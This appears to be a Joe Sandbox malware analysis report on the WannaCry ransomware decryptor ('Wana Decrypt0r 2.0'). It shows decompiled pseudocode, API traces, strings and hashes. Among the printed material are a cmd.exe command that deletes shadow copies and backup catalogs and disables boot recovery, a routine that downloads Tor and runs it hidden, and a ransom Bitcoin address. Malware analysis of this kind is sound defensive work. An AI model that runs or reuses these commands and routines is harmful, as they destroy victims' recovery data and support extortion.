							if(_t136 !=  *_t22) {
								break;
							} else {
								_t161 = _t161 + 2;
								_t140 = _t140 + 2;
								if(_t60 != 0) {
									continue;
								} else {
									goto L12;
								}
							}
						}
						L14:
						if(_t60 == 0) {
							E00407F80(_t90);
							ExitProcess(0);
						}
						_t141 = "co";
						_t162 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
						while(1) {
							_t99 =  *_t162;
							_t63 = _t99;
							if(_t99 !=  *_t141) {
								break;
							}
							if(_t63 == 0) {
								L21:
								_t63 = 0;
							} else {
								_t135 =  *((intOrPtr*)(_t162 + 1));
								_t25 = _t141 + 1; // 0x6600006f
								_t63 = _t135;
								if(_t135 !=  *_t25) {
									break;
								} else {
									_t162 = _t162 + 2;
									_t141 = _t141 + 2;
									if(_t63 != 0) {
										continue;
									} else {
										goto L21;
									}
								}
							}
							L23:
							if(_t63 == 0) {
								E004080C0(_t90);
								ExitProcess(0);
							}
							_t142 = "vs";
							_t163 =  *((intOrPtr*)( *((intOrPtr*)( *_t168())) + 4));
							while(1) {
								_t100 =  *_t163;
								_t66 = _t100;
								if(_t100 !=  *_t142) {
									break;
								}
								if(_t66 == 0) {
									L30:
									_t66 = 0;
								} else {
									_t134 =  *((intOrPtr*)(_t163 + 1));
									_t28 = _t142 + 1; // 0x63000073
									_t66 = _t134;
									if(_t134 !=  *_t28) {
										break;
									} else {
										_t163 = _t163 + 2;
										_t142 = _t142 + 2;
										if(_t66 != 0) {
											continue;
										} else {
											goto L30;
										}
									}
								}
								L32:
								if(_t66 == 0) {
									Sleep(0x2710);
									memset( &_v2256, memcpy( &_v2456, "/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet", 0x32 << 2), 0xce << 2);
									_t70 = "cmd.exe"; // 0x2e646d63
									_t105 =  *0x420fd4; // 0x657865
									_v2724 = _t70;
									_v2720 = _t105;
									if(E00401BB0() != 0) {
										_push( &_v2456);
										_push( &_v2724);
										sprintf( &_v1032, "%s %s");
										E00401A90( &_v1032, 0, 0);
									} else {
										E00401B50( &_v2724,  &_v2456, _t71);
									}
									ExitProcess(0);
								}
								goto L37;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L32;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L23;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L14;
				}
				L37:
				E00407E80();
				SetWindowTextW( *(_t90 + 0x20), L"Wana Decrypt0r 2.0");
				E00406F80(_t90, _t201);
				E00406C20(_t90);
				SetTimer( *(_t90 + 0x20), 0x3e9, 0x3e8, 0);
				SetTimer( *(_t90 + 0x20), 0x3ea, 0x7530, 0);
				 *0x42189c = _t90;
				return 1;
			}

0x004064d0
0x004064da
0x004064dc
0x004064f9
0x0040650d
0x00406511
0x00406516
0x0040651b
0x0040651d
0x00406527
0x00406530
0x00406532
0x00406540
0x00406541
0x00406554
0x00406556
0x0040655b
0x00406564
0x00406566
0x00406569
0x00406569
0x00406571
0x00406571
0x00406577
0x00406580
0x00406585
0x0040658a
0x00406593
0x0040659d
0x004065ab
0x004065bb
0x004065bd
0x004065c7
0x004065d1
0x004065da
0x004065e0
0x004065e5
0x004065e5
0x004065e8
0x004065fa
0x00406600
0x00406609
0x0040660f
0x00406615
0x0040661e
0x00406621
0x00406621
0x00406625
0x00406629
0x00000000
0x00000000
0x0040662d
0x00406645
0x00406645
0x0040662f
0x0040662f
0x00406632
0x00406635
0x00406639
0x00000000
0x0040663b
0x0040663b
0x0040663e
0x00406643
0x00000000
0x00000000
0x00000000
0x00000000
0x00406643
0x00406639
0x0040664e
0x00406650
0x00406654
0x0040665b
0x0040665b
0x00406661
0x0040666a
0x0040666d
0x0040666d
0x00406671
0x00406675
0x00000000
0x00000000
0x00406679
0x00406691
0x00406691
0x0040667b
0x0040667b
0x0040667e
0x00406681
0x00406685
0x00000000
0x00406687
0x00406687
0x0040668a
0x0040668f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040668f
0x00406685
0x0040669a
0x0040669c
0x004066a0
0x004066a7
0x004066a7
0x004066ad
0x004066b6
0x004066b9
0x004066b9
0x004066bd
0x004066c1
0x00000000
0x00000000
0x004066c5
0x004066dd
0x004066dd
0x004066c7
0x004066c7
0x004066ca
0x004066cd
0x004066d1
0x00000000
0x004066d3
0x004066d3
0x004066d6
0x004066db
0x00000000
0x00000000
0x00000000
0x00000000
0x004066db
0x004066d1
0x004066e6
0x004066e8
0x004066f3
0x0040671a
0x0040671c
0x00406721
0x00406727
0x0040672b
0x00406736
0x0040675b
0x0040675c
0x0040676a
0x0040677c
0x00406738
0x00406746
0x0040674b
0x00406786
0x00406786
0x00000000
0x004066e8
0x004066e1
0x004066e3
0x00000000
0x004066e3
0x00406695
0x00406697
0x00000000
0x00406697
0x00406649
0x0040664b
0x00000000
0x0040664b
0x0040678c
0x0040678e
0x0040679c
0x004067a4
0x004067ab
0x004067c6
0x004067d8
0x004067dc
0x004067ef

APIs

#4710.MFC42 ref: 004064DC
SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D

Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
Part of subcall function 00401C70: RegCloseKey.KERNELBASE(00000000), ref: 00401DA3

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
strrchr.MSVCRT ref: 00406554
strrchr.MSVCRT ref: 00406564
SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
time.MSVCRT ref: 004065D1
__p___argc.MSVCRT(00000202,?), ref: 004065FA
__p___argv.MSVCRT ref: 0040661A
ExitProcess.KERNEL32 ref: 0040665B
__p___argv.MSVCRT ref: 00406666
ExitProcess.KERNEL32 ref: 004066A7
__p___argv.MSVCRT ref: 004066B2
Sleep.KERNEL32(00002710), ref: 004066F3
sprintf.MSVCRT ref: 0040676A
ExitProcess.KERNEL32 ref: 00406786
SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8

Strings

/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
%s %s, xrefs: 00406764
cmd.exe, xrefs: 0040671C
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
Wana Decrypt0r 2.0, xrefs: 00406796

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ExitProcess__p___argv$CurrentDirectoryMessageSendTimerstrrchr$#4710CloseCreateFileModuleNameSleepTextValueWindow__p___argcsprintftimewcscat
String ID: %s %s$/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet$13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94$Wana Decrypt0r 2.0$cmd.exe
API String ID: 623806192-606506946
Opcode ID: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
Instruction ID: 76468553a1f47653d6b265dfd970fa21b418b24b97d30d9546a7e2687b9e40c0
Opcode Fuzzy Hash: ae9b914f860960fc1fe1eb8876ac2c32c64d9403cfc96aba4f43f79c31e3e0e0
Instruction Fuzzy Hash: 72816C35704301ABD7109F309C41BEB7B95AF99304F15493AFD4AAB3D1DA7AE8188B98

Uniqueness

Uniqueness Score: -1.00%

Function 004060E0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 139
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004060E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				struct HINSTANCE__* _t82;
				struct HICON__* _t83;
				intOrPtr _t119;
				intOrPtr _t124;

				_push(0xffffffff);
				_push(E00413E0B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t124;
				_push(__ecx);
				_t119 = __ecx;
				_push(_a4);
				_push(0x66);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415a58;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x416538;
				_v12 = 2;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x416538;
				_v12 = 3;
				E004085C0(__ecx + 0x120);
				_v12 = 4;
				E004085C0(__ecx + 0x1a4);
				_v12 = 5;
				E00404090(__ecx + 0x228);
				_v12 = 6;
				E00404090(__ecx + 0x290);
				_v12 = 7;
				E00404090(__ecx + 0x2f8);
				_v12 = 8;
				E00404090(__ecx + 0x360);
				_v12 = 9;
				E00405000(__ecx + 0x3c8);
				_v12 = 0xa;
				E00405000(__ecx + 0x444);
				_v12 = 0xb;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x4c0)) = 0x416478;
				_v12 = 0xc;
				L00412DA6();
				_v12 = 0xd;
				L00412DA6();
				_v12 = 0xe;
				L00412DA6();
				_v12 = 0xf;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x834)) = 0;
				 *((intOrPtr*)(__ecx + 0x830)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x83c)) = 0;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x844)) = 0;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x84c)) = 0;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x854)) = 0;
				 *((intOrPtr*)(__ecx + 0x850)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x85c)) = 0;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x864)) = 0;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x86c)) = 0;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x874)) = 0;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x87c)) = 0;
				 *((intOrPtr*)(__ecx + 0x878)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x884)) = 0;
				 *((intOrPtr*)(__ecx + 0x880)) = 0x415a30;
				_v12 = 0x1b;
				_t82 = E00407640(__ecx + 0x888);
				 *((intOrPtr*)(__ecx + 0x888)) = 0x415a30;
				 *((intOrPtr*)(__ecx + 0x894)) = 0;
				 *((intOrPtr*)(__ecx + 0x890)) = 0x415a30;
				_push(0x421798);
				_v12 = 0x1d;
				 *((intOrPtr*)(__ecx)) = 0x4163a0;
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				_push(0x421798);
				L00412DA0();
				L00412E5A();
				_push(0x80);
				_push(0xe);
				L00412F2C();
				_t83 = LoadIconA(_t82, 0x80); // executed
				_push(0x421798);
				 *(_t119 + 0x82c) = _t83;
				 *((intOrPtr*)(_t119 + 0x824)) = 0;
				 *((intOrPtr*)(_t119 + 0x828)) = 0;
				 *((intOrPtr*)(_t119 + 0x818)) = 0;
				L00412DA0();
				 *((intOrPtr*)(_t119 + 0x820)) = 0;
				 *[fs:0x0] = _v44;
				return _t119;
			}

0x004060e0
0x004060e2
0x004060ed
0x004060ee
0x004060f5
0x004060fe
0x00406100
0x00406101
0x00406103
0x00406107
0x00406113
0x00406117
0x0040611c
0x00406128
0x0040612f
0x00406134
0x00406140
0x00406147
0x0040614c
0x00406158
0x0040615d
0x00406168
0x0040616d
0x00406178
0x0040617d
0x00406188
0x0040618d
0x00406198
0x0040619d
0x004061a8
0x004061ad
0x004061b8
0x004061bd
0x004061c8
0x004061cd
0x004061d8
0x004061df
0x004061e4
0x004061f0
0x004061f7
0x00406202
0x00406209
0x00406214
0x00406219
0x00406224
0x00406229
0x00406233
0x00406239
0x0040623f
0x00406245
0x0040624b
0x00406251
0x00406257
0x0040625d
0x00406263
0x00406269
0x0040626f
0x00406275
0x0040627b
0x00406281
0x00406287
0x0040628d
0x00406293
0x00406299
0x0040629f
0x004062a5
0x004062ab
0x004062b1
0x004062c1
0x004062c6
0x004062cb
0x004062d5
0x004062db
0x004062e5
0x004062ec
0x004062f1
0x004062f7
0x004062fc
0x00406303
0x00406308
0x00406313
0x00406318
0x0040631d
0x00406322
0x00406329
0x0040632f
0x00406335
0x00406340
0x00406346
0x0040634c
0x00406352
0x00406358
0x00406361
0x0040636d
0x00406377

APIs

#324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
#567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
#567.MFC42(00000066,00000000), ref: 0040612F
#567.MFC42(00000066,00000000), ref: 00406147

Part of subcall function 004085C0: #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
Part of subcall function 004085C0: #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
Part of subcall function 004085C0: GetSysColor.USER32 ref: 0040861D
Part of subcall function 004085C0: GetSysColor.USER32(00000009), ref: 00408624
Part of subcall function 004085C0: GetSysColor.USER32(00000012), ref: 0040862B
Part of subcall function 004085C0: GetSysColor.USER32(00000002), ref: 00408632
Part of subcall function 004085C0: KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
Part of subcall function 004085C0: GetSysColor.USER32(0000001B), ref: 0040865C
Part of subcall function 004085C0: #6140.MFC42(00000002,000000FF), ref: 00408667

Part of subcall function 00404090: #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
Part of subcall function 00404090: #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
Part of subcall function 00404090: #860.MFC42(00421798), ref: 004040F6
Part of subcall function 00404090: #858.MFC42(00000000,00421798), ref: 004040FE
Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F89), ref: 00404118
Part of subcall function 00404090: LoadCursorA.USER32(00000000,00007F00), ref: 00404123

Part of subcall function 00405000: #567.MFC42(?,?,?,?,00413893,000000FF), ref: 0040501E
Part of subcall function 00405000: #540.MFC42(?,?,?,?,00413893,000000FF), ref: 00405032

#567.MFC42(00000066,00000000), ref: 004061DF
#540.MFC42(00000066,00000000), ref: 004061F7
#540.MFC42(00000066,00000000), ref: 00406209
#540.MFC42(00000066,00000000), ref: 00406219
#540.MFC42(00000066,00000000), ref: 00406229
#860.MFC42(00421798,00000066,00000000), ref: 004062F7
#860.MFC42(00421798,00421798,00000066,00000000), ref: 00406303
#860.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406313
#1168.MFC42(00421798,00421798,00421798,00000066,00000000), ref: 00406318
#1146.MFC42(00000080,0000000E,00000080,00421798,00421798,00421798,00000066,00000000), ref: 00406329
LoadIconA.USER32(00000000,00000080), ref: 0040632F
#860.MFC42(00421798), ref: 00406358

Strings

0ZA, xrefs: 004062CB
DZA, xrefs: 0040622E
0ZA, xrefs: 004062B1
0ZA, xrefs: 004062DB

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #540#567$#860Color$Load$Cursor$#1146#1168#324#341#6140#858CallbackDispatcherIconUser
String ID: 0ZA$0ZA$0ZA$DZA
API String ID: 3237077636-3729005435
Opcode ID: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
Instruction ID: 094c42c2691411c2b0867f220185f46eb880b1852b80e7f1edf951ce12ca3c27
Opcode Fuzzy Hash: 8898f9c07cd83b19e88eb16f26038038037ccb9ffe995bcce6d49ed8a8e75e34
Instruction Fuzzy Hash: 6261E970544B419ED364EF36C5817DAFBE4BF95304F40891EE1EA82281DFB86149CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040B840 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 138
synchronizationprocessfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				long _t33;
				int _t37;
				void* _t46;
				char _t47;
				long _t51;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				_t33 = GetFileAttributesA( &_v1040); // executed
				if(_t33 != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					_t37 = CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124); // executed
					if(_t37 != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						_t51 = GetFileAttributesA( &_v520); // executed
						if(_t51 != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0); // executed
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", "https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip");
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}

0x0040b846
0x0040b84d
0x0040b861
0x0040b863
0x0040b879
0x0040b87a
0x0040b885
0x0040b88d
0x0040b892
0x0040b95b
0x0040b966
0x0040b970
0x0040b974
0x0040b976
0x0040b982
0x0040b991
0x0040b995
0x0040b99f
0x0040b9aa
0x0040b9b2
0x0040b9d6
0x0040b9e2
0x0040b9e2
0x0040b9ef
0x0040b9f6
0x0040ba02
0x0040b9b5
0x0040b9be
0x0040b9be
0x0040b898
0x0040b8a4
0x0040b8a9
0x0040b8ae
0x0040b8e9
0x0040b8e9
0x0040b8f3
0x0040b908
0x0040b90a
0x0040b923
0x0040b924
0x0040b929
0x0040b934
0x0040b939
0x0040b955
0x00000000
0x0040b93c
0x0040b945
0x0040b945
0x0040b8b0
0x0040b8b0
0x0040b8bc
0x0040b8c1
0x0040b8c6
0x00000000
0x0040b8c8
0x0040b8c8
0x0040b8d4
0x0040b8d9
0x0040b8de
0x00000000
0x0040b8e8
0x0040b8e8
0x0040b8e8
0x0040b8de
0x0040b8c6
0x0040b8ae

APIs

sprintf.MSVCRT ref: 0040B87A
GetFileAttributesA.KERNELBASE(?,?,?,?,00000000,?), ref: 0040B88D
CreateProcessA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA

Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,757F3310,00000000,00000428), ref: 0040B6B4
Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9

sprintf.MSVCRT ref: 0040B924
GetFileAttributesA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934

Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,757F3310,00000428), ref: 0040B793
Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815

CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6

Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C

Strings

tor.exe, xrefs: 0040B903
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040B8B2
s.wnry, xrefs: 0040B89A
%s\%s\%s, xrefs: 0040B873, 0040B91D
taskhsvc.exe, xrefs: 0040B85C
D, xrefs: 0040B966
Tor, xrefs: 0040B865, 0040B90C
TaskData, xrefs: 0040B86A, 0040B89F, 0040B8B7, 0040B8CF, 0040B911

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
API String ID: 4284242699-3937372533
Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E

Uniqueness

Uniqueness Score: -1.00%

Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}

0x00405a60
0x00405a62
0x00405a6d
0x00405a6e
0x00405a85
0x00405a8a
0x00405a8c
0x00405a96
0x00405a9b
0x00405aa6
0x00405ab3
0x00405abe
0x00405ac1
0x00405ad2
0x00405add
0x00405ae4
0x00405af0
0x00405af8
0x00405aff
0x00405b0b
0x00405b13
0x00405b1a
0x00405b2b
0x00405b33
0x00405b3a
0x00405b46
0x00405b4e
0x00405b55
0x00405b61
0x00405b69
0x00405b70
0x00405b7c
0x00405b84
0x00405b8b
0x00405b90
0x00405b98
0x00405ba6
0x00405bb2
0x00405bba
0x00405bc1
0x00405bcd
0x00405bd5
0x00405bdc
0x00405be8
0x00405bf0
0x00405bf7
0x00405c03
0x00405c0b
0x00405c17
0x00405c1f
0x00405c2b
0x00405c33
0x00405c3f
0x00405c47
0x00405c53
0x00405c5b
0x00405c67
0x00405c6f
0x00405c7b
0x00405c83
0x00405c8f
0x00405c97
0x00405ca3
0x00405cab
0x00405cb7
0x00405cbf
0x00405ccb
0x00405cd3
0x00405cdf
0x00405ce7
0x00405cf3
0x00405cfb
0x00405d07
0x00405d0f
0x00405d1b
0x00405d23
0x00405d2f
0x00405d37
0x00405d43
0x00405d4b
0x00405d54
0x00405d5c
0x00405d65
0x00405d70
0x00405d7f
0x00405d8c

APIs

